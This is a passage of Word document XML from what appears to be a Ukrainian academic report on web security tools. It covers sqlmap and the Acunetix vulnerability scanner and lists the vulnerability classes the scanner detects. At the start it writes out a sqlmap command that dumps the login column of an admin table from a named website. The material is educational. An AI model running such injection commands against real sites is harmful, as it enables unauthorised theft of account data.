        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16A64">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Вивести вміст (--dump) колонки login (-C login) для таблиці admin (-T admin) для бази даних laminat (-D laminat) для сайту http://www.sqldummywebsite.name/rubrika.php?id=31 (-u http://www.sqldummywebsite.name/rubrika.php?id=31)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3E4791" w14:textId="2647FE64" w:rsidR="005364C9" w:rsidRPr="005027FB" w:rsidRDefault="00F16A64" w:rsidP="002F1513">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16A64">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin -C login </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00F16A64">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="004B547E" w:rsidRPr="005027FB">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [42]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C6212F" w14:textId="1AA674C6" w:rsidR="00772CE7" w:rsidRPr="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3144E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3144E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3144E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3144E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Опис </w:t>
      </w:r>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Acunetix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED45580" w14:textId="3F43B18D" w:rsidR="00772CE7" w:rsidRPr="00877BAF" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Scanner</w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="00877BAF">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">(рис. </w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="00877BAF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="00877BAF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>6.8.4</w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> автоматизує задачу контролю безпеки Web додатків і дозволяє виявити вразливі місця в захисті web-сайту до того, як їх виявить і використає зловмисник.</w:t>
      </w:r>
      <w:r w:rsidR="00405BD4">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00405BD4" w:rsidRPr="00877BAF">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>[43]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A62F40A" w14:textId="13495CA9" w:rsidR="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Як працює Acunetix Web Vulnerability Scanner:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00747DF7" w14:textId="65E6012A" w:rsidR="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Acunetix WVS досліджує і формує структуру сайту, обробляючи всі знайдені посилання і збираючи інформацію про всі виявлені файли;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C79953" w14:textId="7A31AB70" w:rsidR="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Потім програма тестує всі web-сторінки з елементами для введення даних, моделюючи введення даних з використанням усіх можливих комбінацій і аналізуючи отримані результати;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8AED35" w14:textId="1A1C705B" w:rsidR="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Виявивши вразливість, Acunetix WVS видає відповідне попередження, яке містить опис уразливості і рекомендації по її усуненню;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500F1BBD" w14:textId="04F3E81E" w:rsidR="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Підсумковий звіт WVS може бути записаний в файл чи базу даних для подальшого аналізу і порівняння з результатами попередніх перевірок.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1C68C5" w14:textId="7C7A2941" w:rsidR="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Які уразливості виявляє Acunetix Web Vulnerability Scanner:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5308194A" w14:textId="77777777" w:rsidR="00772CE7" w:rsidRPr="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Cross site scripting (виконання шкідливого сценарію в браузері користувача при зверненні та у контексті безпеки довіреного сайту);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BEFE00" w14:textId="77777777" w:rsidR="00772CE7" w:rsidRPr="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQL injection (виконання SQL-запитів з браузера для отримання несанкціонованого доступу до даних);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52234933" w14:textId="77777777" w:rsidR="00772CE7" w:rsidRPr="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>База даних GHDB (Google hacking database) - перелік типових запитів, що використовуються хакерами для отримання несанкціонованого доступу до web-додатків і сайтів.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBC0577" w14:textId="77777777" w:rsidR="00772CE7" w:rsidRPr="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Виконання коду:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2A7B32" w14:textId="77777777" w:rsidR="00772CE7" w:rsidRPr="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Обхід каталогу;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC52C9E" w14:textId="77777777" w:rsidR="00772CE7" w:rsidRPr="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Вставка файлів (File inclusion);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4D8231" w14:textId="77777777" w:rsidR="00772CE7" w:rsidRPr="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Розкриття вихідного тексту сценарію;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11884EA5" w14:textId="77777777" w:rsidR="00772CE7" w:rsidRPr="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>CRLF injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353DD64D" w14:textId="77777777" w:rsidR="00772CE7" w:rsidRPr="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Cross frame scripting;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205310F4" w14:textId="77777777" w:rsidR="00772CE7" w:rsidRPr="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Загальнодоступні резервні копії файлів і папок;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBE3756" w14:textId="77777777" w:rsidR="00772CE7" w:rsidRPr="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Файли і папки, що містять важливу інформацію;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755D97C9" w14:textId="77777777" w:rsidR="00772CE7" w:rsidRPr="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Файли, які можуть містити інформацію, необхідну для проведення атак (системні логи, журнали трасування додатків і т.д.);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2294E70B" w14:textId="77777777" w:rsidR="00772CE7" w:rsidRPr="00772CE7" w:rsidRDefault="00772CE7" w:rsidP="00772CE7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772CE7">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Файли, що містять списки папок;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEB9BD5" w14:textId="1F74E394" w:rsidR="00772CE7" w:rsidRPr="00877BAF" w:rsidRDefault="00772CE7" w:rsidP="00B45470">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636AF5">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Папки з низьким рівнем захисту, що дозволяють створювати, модифікувати або видаляти файли.</w:t>
      </w:r>
      <w:r w:rsidR="00405BD4" w:rsidRPr="00636AF5">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00405BD4" w:rsidRPr="00636AF5">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[43]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624B6281" w14:textId="77777777" w:rsidR="00877BAF" w:rsidRPr="00877BAF" w:rsidRDefault="00877BAF" w:rsidP="00877BAF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C5047BD" w14:textId="6A53BF6A" w:rsidR="00877BAF" w:rsidRDefault="00877BAF" w:rsidP="00877BAF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E422B82" wp14:editId="0D5CBBCE">
            <wp:extent cx="6120130" cy="3473450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="Рисунок 26" descr="Image result for acune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acunetix"/>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3473450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="332B985F" w14:textId="515D6B82" w:rsidR="00877BAF" w:rsidRDefault="00877BAF" w:rsidP="00877BAF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
